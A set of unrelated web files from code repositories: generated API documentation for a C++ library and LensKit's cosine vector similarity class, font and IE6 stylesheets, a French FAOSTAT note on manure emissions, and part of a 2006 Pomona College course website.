</div><div class="links"><div class="file">File: <a href="../../../File/vsip/core/expr/fns_elementwise.hpp.html" target="detail">../../../vsip/core/expr/fns_elementwise.hpp</a></div> <div class="xref"></div> <div class="source"><a href="../../../Source/vsip/core/expr/fns_elementwise.hpp.html#line451"><img src="../../../src-c++.png" alt="source code"/></a></div></div> <div class="doc"></div> <img alt="Dispatch_hypot-inheritance" src="Dispatch_hypot-inheritance.png" hspace="8" vspace="8" border="0" usemap="#Dispatch_hypot-inheritance_map" />
<map name="Dispatch_hypot-inheritance_map"><area alt="Scopes/vsip/impl/conditional.html#type" href="conditional.html#type" shape="rect" coords="5, 6, 179, 34" />
</map>
<!-- this part was generated by Body -->
<!-- this part was generated by Inheritance -->
<div class="logo">Generated on Sat Apr 17 11:13:54 2010 by
<br/>
<a href="http://synopsis.fresco.org" target="_blank"><img src="../../../synopsis.png" alt="logo"/> synopsis</a> (version 0.12)</div>
</body>
</html>
|
assets/fonts/Yokawerad/stylesheet.css | BFrancoeur/wpwc-dev-theme | /*! Generated by Font Squirrel (https://www.fontsquirrel.com) on July 1, 2017 */
@font-face {
font-family: 'yokaweradregular';
src: url('yokawerad-webfont.eot');
src: url('yokawerad-webfont.eot?#iefix') format('embedded-opentype'),
url('yokawerad-webfont.woff2') format('woff2'),
url('yokawerad-webfont.woff') format('woff'),
url('yokawerad-webfont.ttf') format('truetype'),
url('yokawerad-webfont.svg#yokaweradregular') format('svg');
font-weight: normal;
font-style: normal;
} |
src/main/webapp/notes/GU/Description_F.html | FAOSTAT3-Lab/download | <div class="download-notes">
<div class="noteHead"> <h2>Fumier appliqué aux sols</h2> <img id='DOMAIN_IMG' src="images/G1.png" width="50" height="50" /></div>
<script>
$('#DOMAIN_IMG').attr('src', FAOSTATDownload.prefix + 'images/G1.png');
</script>
<div class="backBtn">
<div class='goto' id='G1_notes'>
<div id='back_label' style='width: 100%; text-align: center; padding-top: 3px;'></div>
</div>
</div>
<br>
Les émissions de gaz à effet de serre (GES) imputables au fumier appliqué aux sols sont constituées de gaz d'oxyde nitreux issus d'ajouts d'azote aux sols gérés provenant de fumier traité. Ces données sont calculées selon la méthode de niveau 1 des Lignes directrices de 2006 du GIEC pour les Inventaires nationaux de gaz à effet de serre; disponibles par pays, avec une couverture mondiale et relatives à une période partant de 1961 à nos jours, avec des mises à jour annuelles, et des projections à l'horizon 2030 et 2050.
<br><br>
<a id='PDF' href='/faostat-download-js/PDF/FR/FumierAppliqueAuxSols.pdf' target='_blank'>Show Metadata</a>
<script>
switch (F3DWLD.CONFIG.lang) {
case 'E': $('#PDF').attr('href', FAOSTATDownload.prefix + 'PDF/EN/GU.pdf'); break;
case 'F': $('#PDF').attr('href', FAOSTATDownload.prefix + 'PDF/FR/GU.pdf'); break;
case 'S': $('#PDF').attr('href', FAOSTATDownload.prefix + 'PDF/ES/GU.pdf'); break;
}
document.getElementById('PDF').innerHTML = $.i18n.prop('_show_metadata');
document.getElementById('back_label').innerHTML = $.i18n.prop('_back');
</script>
</div> |
javadoc/org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html | ac0872/CTRecommenderLab | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_40) on Wed May 06 14:21:42 CDT 2015 -->
<title>CosineVectorSimilarity (LensKit 2.2)</title>
<meta name="date" content="2015-05-06">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="CosineVectorSimilarity (LensKit 2.2)";
}
}
catch(err) {
}
//-->
var methods = {"i0":10,"i1":10,"i2":10,"i3":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../../../../org/grouplens/lenskit/vectors/similarity/DistanceVectorSimilarity.html" title="class in org.grouplens.lenskit.vectors.similarity"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html" target="_top">Frames</a></li>
<li><a href="CosineVectorSimilarity.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.grouplens.lenskit.vectors.similarity</div>
<h2 title="Class CosineVectorSimilarity" class="title">Class CosineVectorSimilarity</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>org.grouplens.lenskit.vectors.similarity.CosineVectorSimilarity</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd>java.io.Serializable, <a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html" title="interface in org.grouplens.lenskit.vectors.similarity">VectorSimilarity</a></dd>
</dl>
<hr>
<br>
<pre><a href="../../../../../org/grouplens/lenskit/core/Shareable.html" title="annotation in org.grouplens.lenskit.core">@Shareable</a>
public class <span class="typeNameLabel">CosineVectorSimilarity</span>
extends java.lang.Object
implements <a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html" title="interface in org.grouplens.lenskit.vectors.similarity">VectorSimilarity</a>, java.io.Serializable</pre>
<div class="block">Cosine similarity for vectors.</div>
<dl>
<dt><span class="seeLabel">See Also:</span></dt>
<dd><a href="../../../../../serialized-form.html#org.grouplens.lenskit.vectors.similarity.CosineVectorSimilarity">Serialized Form</a></dd>
</dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#CosineVectorSimilarity--">CosineVectorSimilarity</a></span>()</code>
<div class="block">Construct an undamped cosine similarity function.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#CosineVectorSimilarity-double-">CosineVectorSimilarity</a></span>(double damping)</code>
<div class="block">Construct a new cosine similarity function.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#isSparse--">isSparse</a></span>()</code>
<div class="block">Query whether this similarity function is sparse (returns 0 for vectors with
disjoint key sets).</div>
</td>
</tr>
<tr id="i1" class="rowColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#isSymmetric--">isSymmetric</a></span>()</code>
<div class="block">Query whether this similarity function is symmetric.</div>
</td>
</tr>
<tr id="i2" class="altColor">
<td class="colFirst"><code>double</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#similarity-org.grouplens.lenskit.vectors.SparseVector-org.grouplens.lenskit.vectors.SparseVector-">similarity</a></span>(<a href="../../../../../org/grouplens/lenskit/vectors/SparseVector.html" title="class in org.grouplens.lenskit.vectors">SparseVector</a> vec1,
<a href="../../../../../org/grouplens/lenskit/vectors/SparseVector.html" title="class in org.grouplens.lenskit.vectors">SparseVector</a> vec2)</code>
<div class="block">Compute the similarity between two vectors.</div>
</td>
</tr>
<tr id="i3" class="rowColor">
<td class="colFirst"><code>java.lang.String</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html#toString--">toString</a></span>()</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="CosineVectorSimilarity--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>CosineVectorSimilarity</h4>
<pre>public CosineVectorSimilarity()</pre>
<div class="block">Construct an undamped cosine similarity function.</div>
</li>
</ul>
<a name="CosineVectorSimilarity-double-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>CosineVectorSimilarity</h4>
<pre>@Inject
public CosineVectorSimilarity(<a href="../../../../../org/grouplens/lenskit/vectors/similarity/SimilarityDamping.html" title="annotation in org.grouplens.lenskit.vectors.similarity">@SimilarityDamping</a>
double damping)</pre>
<div class="block">Construct a new cosine similarity function.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>damping</code> - The Bayesian damping term (added to denominator), to bias the
similarity towards 0 for low-cooccurance vectors.</dd>
</dl>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="similarity-org.grouplens.lenskit.vectors.SparseVector-org.grouplens.lenskit.vectors.SparseVector-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>similarity</h4>
<pre>public double similarity(<a href="../../../../../org/grouplens/lenskit/vectors/SparseVector.html" title="class in org.grouplens.lenskit.vectors">SparseVector</a> vec1,
<a href="../../../../../org/grouplens/lenskit/vectors/SparseVector.html" title="class in org.grouplens.lenskit.vectors">SparseVector</a> vec2)</pre>
<div class="block"><span class="descfrmTypeLabel">Description copied from interface: <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#similarity-org.grouplens.lenskit.vectors.SparseVector-org.grouplens.lenskit.vectors.SparseVector-">VectorSimilarity</a></code></span></div>
<div class="block">Compute the similarity between two vectors.</div>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#similarity-org.grouplens.lenskit.vectors.SparseVector-org.grouplens.lenskit.vectors.SparseVector-">similarity</a></code> in interface <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html" title="interface in org.grouplens.lenskit.vectors.similarity">VectorSimilarity</a></code></dd>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>vec1</code> - The left vector to compare.</dd>
<dd><code>vec2</code> - The right vector to compare.</dd>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>The similarity, in the range [-1,1].</dd>
</dl>
</li>
</ul>
<a name="isSparse--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>isSparse</h4>
<pre>public boolean isSparse()</pre>
<div class="block"><span class="descfrmTypeLabel">Description copied from interface: <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#isSparse--">VectorSimilarity</a></code></span></div>
<div class="block">Query whether this similarity function is sparse (returns 0 for vectors with
disjoint key sets).</div>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#isSparse--">isSparse</a></code> in interface <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html" title="interface in org.grouplens.lenskit.vectors.similarity">VectorSimilarity</a></code></dd>
<dt><span class="returnLabel">Returns:</span></dt>
<dd><code>true</code> iff <a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#similarity-org.grouplens.lenskit.vectors.SparseVector-org.grouplens.lenskit.vectors.SparseVector-"><code>VectorSimilarity.similarity(SparseVector, SparseVector)</code></a> will always return
true when applied to two vectors with no keys in common.</dd>
</dl>
</li>
</ul>
<a name="isSymmetric--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>isSymmetric</h4>
<pre>public boolean isSymmetric()</pre>
<div class="block"><span class="descfrmTypeLabel">Description copied from interface: <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#isSymmetric--">VectorSimilarity</a></code></span></div>
<div class="block">Query whether this similarity function is symmetric. Symmetric similarity functions
return the same result when called on (A,B) and (B,A).</div>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html#isSymmetric--">isSymmetric</a></code> in interface <code><a href="../../../../../org/grouplens/lenskit/vectors/similarity/VectorSimilarity.html" title="interface in org.grouplens.lenskit.vectors.similarity">VectorSimilarity</a></code></dd>
<dt><span class="returnLabel">Returns:</span></dt>
<dd><code>true</code> if the function is symmetric.</dd>
</dl>
</li>
</ul>
<a name="toString--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>toString</h4>
<pre>public java.lang.String toString()</pre>
<dl>
<dt><span class="overrideSpecifyLabel">Overrides:</span></dt>
<dd><code>toString</code> in class <code>java.lang.Object</code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></div>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../../../../org/grouplens/lenskit/vectors/similarity/DistanceVectorSimilarity.html" title="class in org.grouplens.lenskit.vectors.similarity"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/grouplens/lenskit/vectors/similarity/CosineVectorSimilarity.html" target="_top">Frames</a></li>
<li><a href="CosineVectorSimilarity.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
proto/Задать_вопрос_files/axurerp_pagespecificstyles_ie6.css | seavan/smoltoday | * html .u2_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Шапка_files/u21_normal.png");
}
* html .u4_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Шапка_files/u23_normal.png");
}
* html .u6_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Шапка_files/u25_normal.png");
}
* html .u13_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Шапка_files/u32_normal.png");
}
* html .u16_menu {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u2_menu.png");
}
* html .u18_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u4_normal.png");
}
* html .u20_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u6_normal.png");
}
* html .u22_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u8_normal.png");
}
* html .u24_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u10_normal.png");
}
* html .u26_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u6_normal.png");
}
* html .u28_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u14_normal.png");
}
* html .u30_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u16_normal.png");
}
* html .u32_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u18_normal.png");
}
* html .u36_menu {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u34_menu.png");
}
* html .u38_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u40_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u42_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u44_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u46_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u48_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u50_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u52_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u54_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u56_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u58_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u36_normal.png");
}
* html .u60_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_афиша_files/u58_normal.png");
}
* html .u70_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Подвал_files/u60_normal.png");
}
* html .u72_menu {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u2_menu.png");
}
* html .u74_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u4_normal.png");
}
* html .u76_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u6_normal.png");
}
* html .u78_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u8_normal.png");
}
* html .u80_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u10_normal.png");
}
* html .u82_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u6_normal.png");
}
* html .u84_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u14_normal.png");
}
* html .u86_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u16_normal.png");
}
* html .u88_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Меню_главное_files/u18_normal.png");
}
* html .u91_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Подвал_files/u81_normal.png");
}
* html .u98_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u98_normal.png");
}
* html .u100_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u100_normal.png");
}
* html .u102_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u102_normal.png");
}
* html .u104_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u102_normal.png");
}
* html .u106_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u102_normal.png");
}
* html .u108_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u102_normal.png");
}
* html .u110_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u102_normal.png");
}
* html .u117_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u117_normal.png");
}
* html .u142_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u142_normal.png");
}
* html .u144_normal {
background-image: none;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src="Задать_вопрос_files/u144_normal.png");
}
|
public/css/style.css | olliecee/LearningPHP | body {
margin: 0;
padding: 0;
width: 100%;
display: table;
font-weight: 100;
font-family: 'Lato';
} |
190-2006/taxonomy/term/270/index.html | kfitz/machines | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Kinko's | MS 190: Authorship</title>
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rss+xml" title="RSS - Kinko&#039;s" href="0/feed/index.html" />
<link rel="shortcut icon" href="../../../misc/favicon.ico" type="image/x-icon" />
<style type="text/css" media="all">@import "../../../modules/aggregator/aggregator.css";</style>
<style type="text/css" media="all">@import "../../../modules/node/node.css";</style>
<style type="text/css" media="all">@import "../../../modules/system/defaults.css";</style>
<style type="text/css" media="all">@import "../../../modules/system/system.css";</style>
<style type="text/css" media="all">@import "../../../modules/user/user.css";</style>
<style type="text/css" media="all">@import "../../../sites/machines.pomona.edu.190-2006/themes/pushbutton/style.css";</style>
</head>
<body bgcolor="#ffffff">
<div class="hide"><a href="#content" title="Skip navigation." accesskey="2">Skip navigation</a>.</div>
<table id="primary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td id="home" width="10%">
<a href="../../../index.html" title="Home"><img src="../../../sites/machines.pomona.edu.190-2006/themes/pushbutton/logo.png" alt="Home" border="0" /></a>
</td>
<td id="site-info" width="20%">
<div class='site-name'><a href="../../../index.html" title="Home">MS 190: Authorship</a></div>
</td>
<td class="primary-links" width="70%" align="center" valign="middle">
<ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li>
<li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai site</a></li>
</ul> </td>
</tr>
</table>
<table id="secondary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td class="secondary-links" width="75%" align="center" valign="middle">
</td>
<td width="25%" align="center" valign="middle">
</td>
</tr>
<tr>
<td colspan="2"><div></div></td>
</tr>
</table>
<table id="content" border="0" cellpadding="15" cellspacing="0" width="100%">
<tr>
<td id="sidebar-left">
<div class="block block-block" id="block-block-1">
<div class="title"><h3>About</h3></div>
<div class="content"><p><a href="../../../index.html">MS 190: Authorship</a> is the course website for the Fall 2006 Media Studies senior seminar at Pomona College in Claremont, California.</p>
<p><a href="../../../syllabus/index.html">Syllabus</a><br />
<a href="../8/index.html">Class information</a></p>
</div>
</div><div class="block block-blog" id="block-blog-0">
<div class="title"><h3>Recent blog posts</h3></div>
<div class="content"><div class="item-list"><ul><li><a href="../../../node/716/index.html">Site Archived</a></li><li><a href="../../../node/715/index.html">Another YouTube Phenomenon: "What Do You Love About Music"</a></li><li><a href="../../../node/712/index.html">Blog Blahbla</a></li><li><a href="../../../node/711/index.html">blog about blogging</a></li><li><a href="../../../node/710/index.html">KIDS incorporated</a></li><li><a href="../../../node/709/index.html">consumer whores</a></li><li><a href="../../../node/708/index.html">HELP STALLONE</a></li><li><a href="../../../node/707/index.html">i heart youtube</a></li><li><a href="../../../node/706/index.html">COME TO MY WINDOW!</a></li><li><a href="../../../node/705/index.html">authorin' is funny times</a></li></ul></div><div class="more-link"><a href="../../../blog/index.html" title="Read the latest blog entries.">more</a></div></div>
</div><div class="block block-comment" id="block-comment-0">
<div class="title"><h3>Recent comments</h3></div>
<div class="content"><div class="item-list"><ul><li><a href="../../../node/527/index.html#comment-576">You've got it wrong. Yin</a><br />4 years 17 weeks ago</li><li><a href="../../../node/527/index.html#comment-575">Do you remember the title of</a><br />4 years 17 weeks ago</li><li><a href="../../../node/695/index.html#comment-550">the bubble boy</a><br />4 years 19 weeks ago</li><li><a href="../../../node/660/index.html#comment-549">mine's just a nickname...</a><br />4 years 19 weeks ago</li><li><a href="../../../node/694/index.html#comment-548">thats a great song
</a><br />4 years 19 weeks ago</li><li><a href="../../../node/695/index.html#comment-547">ball and chain</a><br />4 years 19 weeks ago</li><li><a href="../../../node/708/index.html#comment-546">it very much depends</a><br />4 years 19 weeks ago</li><li><a href="../../../node/700/index.html#comment-545">video fun ya ya</a><br />4 years 19 weeks ago</li><li><a href="../../../node/692/index.html#comment-544">hahahaaa the first read</a><br />4 years 19 weeks ago</li><li><a href="../../../node/692/index.html#comment-543">oh yeah my original point</a><br />4 years 19 weeks ago</li></ul></div></div>
</div> </td>
<td valign="top">
<div id="main">
